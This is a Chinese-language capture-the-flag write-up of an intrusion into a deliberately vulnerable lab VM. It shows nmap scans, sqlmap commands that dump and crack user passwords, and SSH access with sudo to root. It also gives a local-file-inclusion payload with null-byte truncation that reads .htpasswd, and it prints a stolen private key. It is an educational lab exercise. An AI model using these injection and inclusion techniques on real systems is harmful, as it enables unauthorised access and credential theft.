信息收集
nmap扫描网段
开机前
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.132 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::20c:29ff:fe17:9209 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:17:92:09 txqueuelen 1000 (Ethernet)
RX packets 7 bytes 1105 (1.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 25 bytes 3296 (3.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 4 bytes 240 (240.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4 bytes 240 (240.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ nmap -sn 192.168.1.000/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 15:18 CST
Nmap scan report for 192.168.1.2
Host is up (0.00024s latency).
Nmap scan report for 192.168.1.132
Host is up (0.00012s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 4.81 seconds
开机后
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ nmap -sn 192.168.1.000/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 15:21 CST
Nmap scan report for 192.168.1.2
Host is up (0.00049s latency).
Nmap scan report for 192.168.1.132
Host is up (0.000019s latency).
Nmap scan report for 192.168.1.134
Host is up (0.00032s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 4.31 seconds
192.168.1.134为主机地址,下一步是对主机服务进行扫描
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ nmap -min-rate=10000 -p- 192.168.1.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 15:38 CST
Nmap scan report for 192.168.1.134
Host is up (0.00034s latency).
Not shown: 65512 filtered tcp ports (no-response), 19 filtered tcp ports (host-unreach)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
631/tcp closed ipp
Nmap done: 1 IP address (1 host up) scanned in 15.32 seconds
80端口需要关注一下,631也可以关注一下,可能会有后台界面或者登录界面
进一步进行服务扫描
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ sudo nmap -sT -sV -O -p 22,25,80,631 192.168.1.134
[sudo] password for pixe1_p0ints:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 16:02 CST
Nmap scan report for 192.168.1.134
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Sendmail 8.13.5/8.13.5
80/tcp open http Apache httpd 2.2.0 ((Fedora))
631/tcp closed ipp
MAC Address: 00:0C:29:28:D9:61 (VMware)
Device type: general purpose|proxy server|remote management|terminal server|switch|WAP
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (96%), SonicWALL embedded (93%), Control4 embedded (93%), Lantronix embedded (93%), SNR embedded (93%), Dell iDRAC 6 (92%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:sonicwall:aventail_ex-6000 cpe:/h:lantronix:slc_8 cpe:/h:snr:snr-s2960 cpe:/o:dell:idrac6_firmware cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel:4.1
Aggressive OS guesses: Linux 2.6.16 - 2.6.21 (96%), Linux 2.6.13 - 2.6.32 (95%), SonicWALL Aventail EX-6000 VPN appliance (93%), Control4 HC-300 home controller (93%), Lantronix SLC 8 terminal server (Linux 2.6) (93%), SNR SNR-S2960 switch (93%), Linux 2.6.8 - 2.6.30 (92%), Linux 2.6.9 - 2.6.18 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), Linux 2.6.18 - 2.6.32 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: ctf4.sas.upenn.edu; OS: Unix
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.73 seconds
换一种协议
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ sudo nmap -sU -sV -O -p 22,25,80,631 192.168.1.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 16:03 CST
Nmap scan report for 192.168.1.134
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
22/udp filtered ssh
25/udp filtered smtp
80/udp filtered http
631/udp closed ipp
MAC Address: 00:0C:29:28:D9:61 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.47 seconds
nmap自带的漏洞脚本扫一下,没想到结果还挺多
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ nmap --script=vuln -p22,25,80,631 172.19.0.18
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-08 08:45 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 172.19.0.18
Host is up (0.00025s latency).
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sql-injection:
| Possible sqli for queries:
| http://172.19.0.18:80/?title=Blog&id=5%27%20OR%20sqlspider&page=blog
| http://172.19.0.18:80/?title=Blog&id=6%27%20OR%20sqlspider&page=blog
| http://172.19.0.18:80/?title=Blog&id=7%27%20OR%20sqlspider&page=blog
|_ http://172.19.0.18:80/?title=Blog&id=2%27%20OR%20sqlspider&page=blog
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=172.19.0.18
| Found the following possible CSRF vulnerabilities:
|
| Path: http://172.19.0.18:80/
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/index.html?page=search&title=Search Results
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/index.html?page=blog&title=Blog
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/index.html?title=Home Page
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/index.html?page=contact&title=Contact
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/index.html?page=research&title=Research
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/?page=blog&title=Blog&id=5
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/?page=blog&title=Blog&id=6
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/?page=blog&title=Blog&id=7
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/?page=blog&title=Blog&id=2
| Form id:
|_ Form action: /index.html?page=search&title=Search Results
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum:
| /admin/: Possible admin folder
| /admin/index.php: Possible admin folder
| /admin/login.php: Possible admin folder
| /admin/admin.php: Possible admin folder
| /robots.txt: Robots file
| /icons/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
| /images/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
| /inc/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
| /pages/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
| /restricted/: Potentially interesting folder (401 Authorization Required)
| /sql/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
|_ /usage/: Potentially interesting folder
631/tcp closed ipp
Nmap done: 1 IP address (1 host up) scanned in 171.35 seconds
四个端口中,631端口关闭,其他开放的三个端口里面,还是80端口最有可能有漏洞
访问一下80端口
之前的扫描结果提示可能存在sql注入漏洞
http://172.19.0.18:80/?title=Blog&id=5%27%20OR%20sqlspider&page=blog
渗透部分
先尝试利用sql注入
kali的payload没什么用,看payload知道是blog界面,直接访问就好了
id代表的应该就是文章的序号
sqlmap回显太长,就不全部粘贴了
查看数据库
sqlmap -u 'http://172.19.0.18/index.html?page=blog&title=Blog&id=2%27%20or%201=1#' --dbs
查看当前数据库
sqlmap -u 'http://172.19.0.18/index.html?page=blog&title=Blog&id=2%27%20or%201=1#' --current-db
current database: 'ehks'
查询数据表
sqlmap -u 'http://172.19.0.18/index.html?page=blog&title=Blog&id=2%27%20or%201=1#' -D ehks --tables
Database: ehks
[3 tables]
+---------+
| comment |
| user |
| blog |
+---------+
查询数据
sqlmap -u 'http://172.19.0.18/index.html?page=blog&title=Blog&id=2%27%20or%201=1#' -D ehks -T user --columns
Database: ehks
Table: user
[3 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| user_id | int(11) |
| user_name | varchar(20) |
| user_pass | varchar(32) |
+-----------+-------------+
查询字段
sqlmap -u 'http://172.19.0.18/index.html?page=blog&title=Blog&id=2%27%20or%201=1#' -D ehks -T user -C user_name,user_pass --dump
查询字段值
sqlmap -u 'http://172.19.0.18/index.html?page=blog&title=Blog&id=2%27%20or%201=1#' -D ehks -T user -C user_name,user_pass --dump
Database: ehks
Table: user
[6 entries]
+-----------+--------------------------------------------------+
| user_name | user_pass |
+-----------+--------------------------------------------------+
| achen | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| dstevens | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf) |
| ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1) |
| jdurbin | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978) |
| pmoore | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite) |
| sorzek | 64d1f88b9b276aece4b0edcc25b7a434 (pacman) |
+-----------+--------------------------------------------------+
密码都被md5加密了,不过sqlmap可以自己跑出来
/admin路径下有一个登录界面,账号密码很有可能是匹配这个路径的
每一个账号密码都可以登录,但是登录之后只有这样一个简单的页面,内容很少也没什么价值,显然这个并不是正确方向
目前来看也没有找到其他提示,联想到之前扫到了ssh服务,不如尝试一下
ssh配置及连接
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ssh achen@172.19.0.18
Unable to negotiate with 172.19.0.18 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
报错了,网上查阅资料以后发现是靶机ssh版本太老的问题,我们需要手动添加报错中返回的密钥算法
这里贴一篇解决方案
https://zhuanlan.zhihu.com/p/30840210
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 achen@172.19.0.18
Unable to negotiate with 172.19.0.18 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
又报错了,这次是key-type的问题
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostkeyAlgorithms=+ssh-rsa achen@172.19.0.18
The authenticity of host '172.19.0.18 (172.19.0.18)' can't be established.
RSA key fingerprint is SHA256:NDWh6/414mOsW4P7K6ICc5R67PrX87ADMFUx9DK9ftk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.19.0.18' (RSA) to the list of known hosts.
BSD SSH 4.1
achen@172.19.0.18's password:
继续加参数,输入密码,成功连接
[achen@ctf4 ~]$ whoami
achen
[achen@ctf4 ~]$ sudo -l
User achen may run the following commands on this host:
(ALL) NOPASSWD: ALL
[achen@ctf4 ~]$
这边权限已经是最高了,不需要提权
sudo /bin/bash
渗透成功
官方文档复现
官方文档里面使用了一种文件包含的方法,在网上一众SQL注入里面还算比较新奇,所以来试一下
/pages目录下有三个php文件,而这三个我呢见刚好对应了网站主页上方的菜单栏
切换网站页面,可以发现url会有所改变
http://172.19.0.18/index.html?page=blog&title=Blog
page参数就是控制文件包含的参数
可以猜想后端的代码大概是
<?php
$page = $_GET['page'];
include($page . “.php”);
?>
由此可以对page参数进行文件包含
到包含这一步卡住了,尝试了ssh密钥泄露和直接读取shadow文件,发现权限不够,遂求助于文档,得知在当前目录/restriced路径下存在.htpasswd文件,记录了账号密码
htpasswd是apache的一个组件,主要功能是http验证,但其实.htpasswd并不存在默认路径,这个restriced路径大概率是自己定义的
无怪除官方文档之外都使用的是SQL注入
172.19.0.18/index.html?page=../restricted/.htpasswd%00&title=Blog
因为代码中对page参数使用.php进行拼接,所以这里使用%00进行截断
密码爆破 sorzek:pacman
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostkeyAlgorithms=+ssh-rsa sorzek@172.19.0.18
BSD SSH 4.1
sorzek@172.19.0.18's password:
Last login: Mon Mar 9 15:28:09 2009 from 192.168.0.51
[sorzek@ctf4 ~]$
ssh连接成功
[sorzek@ctf4 ~]$ sudo -l
Sorry, user sorzek may not run sudo on ctf4.
还不是root权限,需要我们手动提权
[sorzek@ctf4 home]$ cat /etc/passwd|grep achen
achen:x:501:501:Andrew Chen:/home/achen:/bin/bash
得知我们目标账户的目录
ssh密钥窃取
列出.ssh目录下的所有隐藏文件
[sorzek@ctf4 home]$ ls -lah /home/achen/.ssh
total 40K
drwxr-xr-x 2 achen achen 4.0K Mar 9 2009 .
drwxr-xr-x 16 achen users 4.0K Mar 10 2009 ..
-rw-rw-r-- 1 achen achen 843 Mar 9 2009 achen_priv.ppk
-rw-rw-r-- 1 achen achen 294 Mar 9 2009 achen_pub.ppk
-rwx------ 1 achen achen 226 Mar 9 2009 authorized_keys
查看私钥
[sorzek@ctf4 home]$ cat /home/achen/.ssh/achen_priv.ppk
PuTTY-User-Key-File-2: ssh-rsa
Encryption: none
Comment: rsa-key-20090309
Public-Lines: 4
AAAAB3NzaC1yc2EAAAABJQAAAIB9HrXHbV0tQkPRiM2zG8/1tIgCD2gA3GwsjopS
N+k9OVHLe7OW6+ZRLXNHVP1FJ6BBVcZDV+CxpgAQj8lsIhiyskjbNzs85k7+8aVb
/JTq8KBnikbXLY2YgPVkkgZ1U9zPKzabSCjARrAxDOx1XEFfZ69T2ZyHP1MwfXGi
MTJgxQ==
Private-Lines: 8
AAAAgDzegfJQ4Ticxwv9XSazlZogeYR2MpiilX11xsA24CufWDl6cwsmp2XDFXyl
4v8MW8zB8b/lj+e4imjsAR/ZPHHlGRyGDyUSrJTusp1arl9UNzZgWnOz2kzvyTMP
R5DazAply2MYcvccGrhx7AXbjOsJZRcyh3gDnF0fu718jdTlAAAAQQD1JRPJe/MR
xOSX3D1ZdMUaSwsIopexRcG5GGZX9LNPMs1eyrEigmIkNQ6viwBI766ase/+79Xw
8seUasmkEkCDAAAAQQCCqQzL9X2f7nZvIRQTZGHiHMIQ6lGnBxwwTaN+N4oKBpcX
nyysSEW+C1Hk/EyXIc2rdLQrsqxjZhtEPdMNGQcXAAAAQQD0btOMDZFaO3DyWzIX
e7KATkMX3ISCajhE+kypXijoFmNOmJqLd956co6kDjFchCnUpMfWqWXP/pcj0/A5
y8vH
Private-MAC: 0b95165eb462c2f0857f1defa082eb5979d9ea69
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ chmod 0700 achen_priv.key
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ssh -i achen_priv.key -oKexAlgorithms=+diffie-hellman-group1-sha1 -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostkeyAlgorithms=+ssh-rsa achen@172.19.0.18
BSD SSH 4.1
Load key "achen_priv.key": Invalid key length
achen@172.19.0.18's password:
因为ssh版本过于老旧,putty已经不支持SSH-1密钥的生成了,想生成密钥需要另寻他处,太麻烦而且原理已经差不多搞清楚了,遂放弃
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
